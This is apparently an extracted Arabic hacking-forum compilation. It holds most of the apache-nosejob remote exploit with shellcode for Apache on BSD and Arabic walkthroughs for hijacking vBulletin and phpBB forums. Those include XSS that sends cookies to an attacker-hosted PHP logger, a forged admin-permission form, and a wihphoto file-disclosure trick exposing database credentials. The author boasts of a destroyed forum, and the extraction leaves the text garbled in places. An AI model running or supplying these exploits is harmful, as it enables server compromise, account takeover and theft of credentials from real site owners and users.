\\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80\\<br />

\\x7c\\\\x24\\\"<br />

\\\" \\\\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\<br />

\\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04\\<br />

\\x20\\\\x89\\\"<br />

\\\" \\\\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\<br />

\\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24\\<br />

\\x14\\\\x89\\\"<br />

\\\" \\\\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\<br />

\\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d\\<br />

\\xcd\\\\x80\\\"<br />

\\\" \\\\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\<br />

\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff\\<br />

\\x04\\\\x24\\\"<br />

\\\" \\\\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\<br />

\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51\\<br />

\\x50\\\\xb0\\\"<br />

\\\" \\\\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\<br />

\\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\<br />

\\x41\\\\x80\\\"<br />

\\\" \\\\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\<br />

\\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0\\<br />

٢٢٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

\\xb0\\\\x5a\\\"<br />

\\\" \\\\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\<br />

\\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\<br />

\\xc0\\\\x50\\\"<br />

\\\" \\\\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\<br />

\\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68\\<br />

\\x2a\\\\x47\\\"<br />

\\\" \\\\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\<br />

\\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04\\<br />

\\xcd\\\\x80\\\"<br />

\\\" \\\\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\<br />

\\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89\\<br />

\\xe3\\\\x50\\\"<br />

\\\" \\\\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\<br />

\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc\\\";<br />

;<br />

struct {<br />

char *type; /* description for newbie penetrator */<br />

int delta; /* delta thingie! */<br />

u_long retaddr; /* return address */<br />

int repretaddr; /* we repeat retaddr thiz many times in the buffer */<br />

int repzero; /* and \\\\0\\'z this many times */<br />

} targets[] = { // hehe, yes theo, that say OpenBSD here!<br />

{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36 },<br />

{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36 },<br />

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36 },<br />

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36 },<br />

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36 },<br />

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36 },<br />

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36 },<br />

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36 },<br />

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36 },<br />

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36 },<br />

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,<br />

36 },<br />

{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42 },<br />

{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 },<br />

{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42 },<br />

{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42 },<br />

{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42 },<br />

}, victim;<br />

٢٢٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

void usage(void) {<br />

int i;<br />

printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apachenosejob.c\\\\n\\\\n\\\");<br />

printf(\\\"Usage: ./apache-nosejob -h host[:80]\\\\n\\\");<br />

printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n\\\");<br />

printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n\\\");<br />

printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n\\\");<br />

printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n\\\");<br />

printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n\\\");<br />

printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n\\\");<br />

printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd,<br />

0x080e0000/nbsd.\\\\n\\\");<br />

printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to<br />

overwrite\\\\n\\\");<br />

printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n\\\");<br />

printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the<br />

buffer\\\\n\\\");<br />

printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n\\\");<br />

printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the<br />

buffer\\\\n\\\");<br />

printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n\\\");<br />

printf(\\\" Optional stuff:\\\\n\\\");<br />

printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for<br />

shellcode reply\\\\n\\\");<br />

printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode<br />

replies\\\\n\\\");<br />

printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n\\\");<br />

printf(\\\"\\\\nExamples will be published in up<strong>com</strong>ing apache-scalp-<br />

HOWTO.pdf\\\\n\\\");<br />

printf(\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\n\\\");<br />

printf(\\\" ID / Return addr / Target specification\\\\n\\\");<br />

for(i = 0; i < sizeof(targets)/sizeof(victim); i++)<br />

printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr, targets[i].type);<br />

exit(1);<br />

}<br />

٢٢٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

int main(int argc, char *argv[]) {<br />

char *hostp, *portp, *cmdz = DEFAULT_CMDZ;<br />

u_char buf[512], *expbuf, *p;<br />

int i, j, lport, sock;<br />

int bruteforce, owned, progress, sc_timeout = 5;<br />

int responses, shown_length = 0;<br />

struct in_addr ia;<br />

struct sockaddr_in sin, from;<br />

struct hostent *he;<br />

if(argc < 4)<br />

usage();<br />

bruteforce = 0;<br />

memset(&victim, 0, sizeof(victim));<br />

while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1) {<br />

switch(i) {<br />

/* required stuff */<br />

case \\'h\\':<br />

hostp = strtok(optarg, \\\":\\\");<br />

if((portp = strtok(NULL, \\\":\\\")) == NULL)<br />

portp = \\\"80\\\";<br />

break;<br />

/* predefined targets */<br />

case \\'t\\':<br />

if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {<br />

printf(\\\"Invalid target\\\\n\\\");<br />

return -1;<br />

}<br />

memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));<br />

break;<br />

/* bruteforce! */<br />

case \\'b\\':<br />

bruteforce++;<br />

victim.type = \\\"Custom target\\\";<br />

victim.retaddr = strtoul(optarg, NULL, 16);<br />

printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\",<br />

٢٢٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

victim.retaddr);<br />

break;<br />

case \\'d\\':<br />

victim.delta = atoi(optarg);<br />

printf(\\\"Using %d as delta\\\\n\\\", victim.delta);<br />

break;<br />

case \\'r\\':<br />

victim.repretaddr = atoi(optarg);<br />

printf(\\\"Repeating the return address %d times\\\\n\\\",<br />

victim.repretaddr);<br />

break;<br />

case \\'z\\':<br />

victim.repzero = atoi(optarg);<br />

printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero);<br />

break;<br />

case \\'o\\':<br />

bruteforce++;<br />

switch(*optarg) {<br />

case \\'f\\':<br />

victim.type = \\\"FreeBSD\\\";<br />

victim.retaddr = 0x80a0000;<br />

victim.delta = -150;<br />

victim.repretaddr = 6;<br />

victim.repzero = 36;<br />

break;<br />

case \\'o\\':<br />

victim.type = \\\"OpenBSD\\\";<br />

victim.retaddr = 0x80000;<br />

victim.delta = -146;<br />

victim.repretaddr = 6;<br />

victim.repzero = 36;<br />

break;<br />

case \\'n\\':<br />

victim.type = \\\"NetBSD\\\";<br />

victim.retaddr = 0x080e0000;<br />

victim.delta = -90;<br />

٢٢٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

victim.repretaddr = 5;<br />

victim.repzero = 42;<br />

break;<br />

default:<br />

printf(\\\"[-] Better luck next time!\\\\n\\\");<br />

break;<br />

}<br />

break;<br />

/* optional stuff */<br />

case \\'w\\':<br />

sc_timeout = atoi(optarg);<br />

printf(\\\"Waiting maximum %d seconds for replies from<br />

shellcode\\\\n\\\", sc_timeout);<br />

break;<br />

case \\'c\\':<br />

cmdz = optarg;<br />

break;<br />

default:<br />

usage();<br />

break;<br />

}<br />

}<br />

if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) {<br />

printf(\\\"[-] In<strong>com</strong>plete target. At least 1 argument is missing (nmap<br />

style!!)\\\\n\\\");<br />

return -1;<br />

}<br />

printf(\\\"[*] Resolving target host.. \\\");<br />

fflush(stdout);<br />

he = gethostbyname(hostp);<br />

if(he)<br />

memcpy(&ia.s_addr, he->h_addr, 4);<br />

else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) {<br />

printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp);<br />

return -1;<br />

}<br />

٢٢٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

printf(\\\"%s\\\\n\\\", inet_ntoa(ia));<br />

srand(getpid());<br />

signal(SIGPIPE, SIG_IGN);<br />

for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {<br />

/* skip invalid return adresses */<br />

if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))<br />

continue;<br />

sock = socket(PF_INET, SOCK_STREAM, 0);<br />

sin.sin_family = PF_INET;<br />

sin.sin_addr.s_addr = ia.s_addr;<br />

sin.sin_port = htons(atoi(portp));<br />

if(!progress)<br />

printf(\\\"[*] Connecting.. \\\");<br />

fflush(stdout);<br />

if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {<br />

perror(\\\"connect()\\\");<br />

exit(1);<br />

}<br />

if(!progress)<br />

printf(\\\"connected!\\\\n\\\");<br />

p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *<br />

REP_SHELLCODE)<br />

+ ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero<br />

+ 1024) * REP_POPULATOR));<br />

PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\" HOST_PARAM<br />

\\\"\\\\r\\\\n\\\");<br />

for (i = 0; i < REP_SHELLCODE; i++) {<br />

PUT_STRING(\\\"X-\\\");<br />

PUT_BYTES(PADSIZE_3, PADDING_3);<br />

PUT_STRING(\\\": \\\");<br />

PUT_BYTES(NOPCOUNT, NOP);<br />

٢٢٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

memcpy(p, shellcode, sizeof(shellcode) - 1);<br />

p += sizeof(shellcode) - 1;<br />

PUT_STRING(\\\"\\\\r\\\\n\\\");<br />

}<br />

for (i = 0; i < REP_POPULATOR; i++) {<br />

PUT_STRING(\\\"X-\\\");<br />

PUT_BYTES(PADSIZE_1, PADDING_1);<br />

PUT_STRING(\\\": \\\");<br />

for (j = 0; j < victim.repretaddr; j++) {<br />

*p++ = victim.retaddr & 0xff;<br />

*p++ = (victim.retaddr >> 8) & 0xff;<br />

*p++ = (victim.retaddr >> 16) & 0xff;<br />

*p++ = (victim.retaddr >> 24) & 0xff;<br />

}<br />

PUT_BYTES(victim.repzero, 0);<br />

PUT_STRING(\\\"\\\\r\\\\n\\\");<br />

}<br />

PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\");<br />

snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2);<br />

PUT_STRING(buf);<br />

PUT_BYTES(PADSIZE_2, PADDING_2);<br />

snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta);<br />

PUT_STRING(buf);<br />

if(!shown_length) {<br />

printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p -<br />

expbuf));<br />

shown_length = 1;<br />

}<br />

write(sock, expbuf, p - expbuf);<br />

progress++;<br />

if((progress%70) == 0)<br />

progress = 1;<br />

if(progress == 1) {<br />

printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr);<br />

for(i = 0; i < 40; i ++)<br />

٢٣٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

printf(\\\" \\\");<br />

printf(\\\"\\\\n\\\");<br />

if(bruteforce)<br />

putchar(\\';\\');<br />

}<br />

else<br />

putchar(((rand()>>8)%2)? \\'P\\': \\'p\\');<br />

fflush(stdout);<br />

responses = 0;<br />

while (1) {<br />

fd_set fds;<br />

int n;<br />

struct timeval tv;<br />

tv.tv_sec = sc_timeout;<br />

tv.tv_usec = 0;<br />

FD_ZERO(&fds);<br />

FD_SET(0, &fds);<br />

FD_SET(sock, &fds);<br />

memset(buf, 0, sizeof(buf));<br />

if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {<br />

if(FD_ISSET(sock, &fds)) {<br />

if((n = read(sock, buf, sizeof(buf) - 1)) < 0)<br />

break;<br />

if(n >= 1)<br />

{<br />

if(!owned)<br />

{<br />

for(i = 0; i < n; i ++)<br />

if(buf[i] == \\'G\\')<br />

responses ++;<br />

else<br />

responses = 0;<br />

if(responses >= 2)<br />

{<br />

owned = 1;<br />

write(sock, \\\"O\\\", 1);<br />

٢٣<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

write(sock, cmdz, strlen(cmdz));<br />

printf(\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx,<br />

repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,<br />

victim.retaddr, victim.repretaddr, victim.repzero);<br />

printf(\\\"Experts say this isn\\'t exploitable, so nothing will happen<br />

now: \\\");<br />

fflush(stdout);<br />

}<br />

} else<br />

write(1, buf, n);<br />

}<br />

}<br />

if(FD_ISSET(0, &fds)) {<br />

if((n = read(0, buf, sizeof(buf) - 1)) < 0)<br />

exit(1);<br />

write(sock, buf, n);<br />

}<br />

}<br />

if(!owned)<br />

break;<br />

}<br />

free(expbuf);<br />

close(sock);<br />

if(owned)<br />

return 0;<br />

if(!bruteforce) {<br />

fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\");<br />

return -1;<br />

}<br />

}<br />

return 0;<br />

}<br />

٢٣٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏((قدتمتجریبها وإختبارها منقبل angels-bytes.<strong>com</strong>قبلوضعهالكم هنا ))<br />

وهذي وصلةتنزیلالبرنامج<br />

http://www.angels-bytes.<strong>com</strong>/?show=tools&action=info&id=19<br />

.....<br />

٢٣٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

اختراق المنتدیات من نوع<br />

" vBulletin2,2,0<br />

$$$$$$<br />

من قول<br />

$$$$$$<br />

---------<br />

:<br />

---------<br />

مقدمة<br />

الموضوع ‏:اختراق ال vBulletin<br />

تركیب سیرفر على جهازكالشخصي)‏ + متصفحانترنت(‏<br />

المتطلبات<br />

المستوى<br />

اكسبلورر)‏ .<br />

) WebServer :<br />

: متوسط<br />

ملاحظة : هذهالطریقةلس تلل vBulletinفقط ‏!!یمكنانتجربها علىانواعاخرى من المنتدیات<br />

.<br />

----------<br />

:<br />

----------<br />

الثغرة<br />

تنقسم طریقةالعملالى عدةاقسام ‏..أولا بع ضالسكربتاتالخبیثةالتيتسرقالكوكیزبالاضافةالىجعل<br />

المنتدى یستقبل<br />

بیانات من مكان خاطيء ‏..لكن یشترطان یسمح المنتد ى بأكواد ال .. HTML<br />

قم بكتابة موضو ع جدیداو رد<br />

هذا الكود<br />

‏(في منتد ى یدعمال ( HTML ‏..ثم اكتباي موضو ع والص قبینالسطور<br />

:<br />

script>document.write('<br />

';


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

<strong>١</strong>٠<strong>١</strong>٢٤٤٤٠٦٤=[٢٠ ؛%‏ bblastvi ٢٠<br />

sit=1011983161<br />

فكرقلیلاالان ‏..این الباسورد ؟؟<br />

الباسورد موجودةلكنبطریقة مشفرة یصعبكسرها ‏..اذن مالحل ؟<br />

قمبنسخالكود الذي وجدته والصقهفيالمتصفح ‏..بهذا الشكل<br />

http://www.victim.<strong>com</strong>/<strong>vb</strong>/index.php?bbuserid=[userid]&bbpassword=[<br />

[password hash<br />

ستجد عبارة : ‏"أهلا بعودتك یا ‏(اسمالذي سرقت منهالكوكیز....)‏ "<br />

في هذه الحالةانتالانتستطیع التحكم بكل شي وكانك مدیرالمنتدى الذي سرقت منهالكوكیز)‏ ..<br />

لكننا نحتاج الىكلمة المرورللدخولالىلوحة التحكم ‏..اذهبالى التحكم)‏ وقم بتعدیلا لبریدالالكتروني<br />

الىبریدك الخا ص وثمقم بتسجیلالخروج<br />

تستطیعاستقبالبرید یحتويباسوردالادمن<br />

)<br />

)<br />

‏..ثماذهب الىاداة .. Forgot Password وعندها<br />

..<br />

اعتقدانكتعلم ما یجبانتفعله بعد ذلك ‏!!ادخلالىلوحة التحكم وافعل ماتشاء<br />

! ..<br />

------------<br />

- :<br />

-----------<br />

الحل<br />

للحمایة من هذه الثغرةقمباغلاقال HTMLفي ) المنتد ى ‏+الرسائلالخاصة ‏+التواقیع ‏+التقویم + ...<br />

(<br />

‏(واي منفذ یمكن من خلاله وضعكود HTMLباي صورةكانت (<br />

كما یجبا غلاكودال IMG ‏..لانه ببساطةبامكانكاستخدامهبدلكلمة ‏فاذا وضعت <br />

او ‏او<br />

ايكلمةاخر ىفانه سیتمتنفیذالسكرب تبشكلاوباخر ‏...لذاكن حذرا واغلق هذهالمنافذ<br />

.<br />

. Be Secret .. Dont' be Lamer<br />

تاریخاكتشا فالثغرة<br />

تمتجربتها علىالاصدار<br />

٢٠٠٢- <strong>١</strong> - ٣<strong>١</strong> :<br />

٢٫٢٫٠ وهيتعملبنجاح ....<br />

٢٣٥


hi_HaCkEr & MaXhAk2000<br />

" vBulletin<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

ثغرة في منتدیات‎2,2,9‎<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$$$$$$<br />

<br />

$$$$$$$$$$$$$$$$<br />

الكاتب:‏ لا <br />

ر د‏<br />

هذه الثغرة خطیرة جداوتؤديبحایة المنتدیا ت....‏‎2.2.9‎ vBulletin<br />

المهم شرحهاكالتالي :<br />

<strong>١</strong> ‏-انسخالكود واحفظهبالمفكرةبامتدادphp<br />


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

Print ($Footer);<br />

*/<br />

Switch ($HTTP_GET_VARS['Action']) {<br />

Case "Log":<br />

$Data = $HTTP_GET_VARS['Cookie'];<br />

$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex<br />

(MD5 (NULL))))));<br />

$Log = FOpen ($LogFile, "a+");<br />

FWrite ($Log, Trim ($Data) . "\n");<br />

FClose ($Log);<br />

Print ("");<br />

Break;<br />

Case "List":<br />

If (!File_Exists ($LogFile) || !In_Array ($Records)) {<br />

Print ("There are No Records");<br />

Exit ();<br />

}<br />

Else {<br />

Print ("");<br />

$Records = Array_UniQue (File ($LogFile));<br />

Print ("");<br />

Print (".:: Statics\n");<br />

Print ("\n");<br />

Print ("o Logged Records : " . Count (File ($LogFile)) . "\n");<br />

Print ("o Listed Records : " . Count ($Records) . " [Not<br />

Counting Duplicates]\n");<br />

Print ("\n");<br />

Print (".:: Options\n");<br />

Print ("\n");<br />

If (Count (File ($LogFile)) > 0) {<br />

$Link['Download'] = "[Download]";<br />

}<br />

Else{<br />

$Link['Download'] = "[No Records in Log]";<br />

}<br />

Print ("o Download Log : " . $Link['Download'] . "\n");<br />

٢٣٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

Print ("o Clear Records : [Y]\n");<br />

Print ("\n");<br />

Print (".:: Records\n");<br />

Print ("\n");<br />

While (List ($Line[0], $Line[1]) = Each ($Records)) {<br />

Print ("" . $Line[0] . ": " . $Line[1]);<br />

}<br />

}<br />

Print ("");<br />

Break;<br />

Case "Delete":<br />

@UnLink ($LogFile);<br />

Print ("Deleted Succsesfuly") Or Die<br />

("Error: Cannot Delete Log");<br />

Print ("");<br />

Break;<br />

}<br />

?><br />

-٢<br />

ارفع الملفلموقع یدعم php<br />

اجعلالض حیة یضغط على هذا اللینك<br />

member2.php?s=[Session]&action=viewsubscription&perpage=[Script<br />

Code]<br />

واستبدال[‏code [script<br />

بهذا<br />

location='Http://[ مكان المل فالذيتمتحمیله<br />

] ?Action=Log&Cookie='+(document.cookie);<br />

4-<br />

إ ذهبألى هذا العنوان<br />

مكان/‏ المل فالذيتمتحمیلهAction=List‏?‏ http://%20<br />

-٣<br />

....<br />

٢٣٨


hi_HaCkEr & MaXhAk2000<br />

" phpbb 2.0.0<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

اختراق منتدیات<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$<br />

من ق ول<br />

$$$$$$$$$<br />

phpbb 2.0.0<br />

وهو شبیهبال <strong>vb</strong><br />

وهو سهل جدابل یعتبرتاافه<br />

یاالله سموباالله<br />

PhpBB2<br />

في ملف admin_ug_auth.php<br />

الوصف :<br />

یمكنك من خلال هذهالثغرةأنتأخذتصریح بأنتكون مدیر والمشر ف العام علىالمنتدى<br />

وبذلك یمكنك الدخولالىلوحةالتحكم متى شئ ت<br />

الأصدار :<br />

٢٫٠٫٠<br />

لتجربة الثغرةاولا سجلبالمنتدى<br />

ثماحفظ رقم عضویتكبالمنتدى<br />

بعدهاافتح المفكرة وانسخ مایليالیها<br />

<br />

<br />

<br />

<br />

method="post" form><br />

action="http://www.domain_name/board_directory/admin/admin_ug_au<br />


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

<br />

<br />

<br />

عدل هذاالعنوانالى عنوان الموقع المستهد ف<br />

http://www.domain_name/board_directory<br />

اخفظهبامتدادhtml<br />

عندماتدخل الىالصفحةالتيقمتبحفظها سو فتجد<br />

قائمة والتيیتماختیارالتصریحالذيتریده لتطبیقالثغرةاخترتصریح<br />

ثمبالمربع الجانبي شع رقم عضویتكبالمنتدى<br />

أضغط زر<br />

بعدها سو فتاتیك شاشةتسجیلالدخول ضعاسمالمستخدم وكلمة المرورالخاصةبك<br />

ثم سو فتجد نفسكفيلوحةتحكمالمنتدى ‏!!أفعل ماتریدالمنتد ى منتداك<br />

وسلااامتكم شفتو سهولت الدرس وهو صرااحه منقولبستعرفو ما حبی تانزلهالا وعلیهتطبیق<br />

Administrator<br />

submit<br />

شووفوو المنتدا ذا<br />

http://forums.xos.ca/<br />

تدمر والحمد الله عقبالالمواقعالبااقیه...‏<br />

٢٤٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏"ثغرة جمیلة في<br />

php في المواقع<br />

"<br />

!!!<br />

"powered by wihphoto"<br />

http://www.*****.<strong>com</strong>/wihphoto/index.php<br />

$$$$$$$$$$$$$$$$<br />

الكاتب MaXhAk2000:<br />

$$$$$$$$$$$$$$$$<br />

تعتبر هذهالثغرة جمیله ومیسره وسهله جدا وهيتعتمد على البح ثالعشوائي وهي متوفرهفياغلب<br />

المواقع المستهدفه...‏<br />

بسماالله نبدأ،،،‏<br />

مهمتناالأساسیةفي هذهالثغرهالبحثقي جوجلاوفيأي محركبحثاخر<br />

سو ف نب حث عنكلمه وسینتجلنا عددكبیییییییر من المواقعالمصابهبها<br />

سو ف یجدلنا مواقعكثیراخترأي واحد منها<br />

اذهبالى جوجل واكتب<br />

بعد ذلك علیك<br />

بحذ ف التالي من عنوانالموقع<br />

سو ف نقومبحذ ف هذه الكلمه index.php ونسبدلهابهذاالعنوان<br />

sendphoto.php?album=..&pic=config.inc.php<br />

سو فتظهرلنا صفحه یطلبفیهاادخالالبریدالذيتریدارسال مل ف الكونفجله .. اكتببرید مثلا<br />

maxhak2000@hotmail.<strong>com</strong><br />

انتظر ذواني سو فتصلك رساله ستجدفیها ملف مرفقاضغط علیه وشغله ### راح یجیككلاامكثیر<br />

الشيءالي راح نستفید منه اكثر شيءهو هذا<br />

// MySQL-DB Einstellungen<br />

// ======================<br />

$database = "usr_web1_5"; //MySQL Datenbankname<br />

اسمقاعدة > عنوانقاع البیانات )<br />

$sqluser = "web1"; //MySQL Username<br />

$sqlpass = "q+q27rym"; //MySQL Passwort<br />

اسمالمستخدم


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

اوكيالآ ن جبناالمعلوماتالي نحتاجهاكلهااليباقي علینا دحین ندخل علىقاعدةالبیاناتاو ندخل على<br />

الصورللدخول علىالصورنتبعالینكالتالي::‏<br />

....<br />

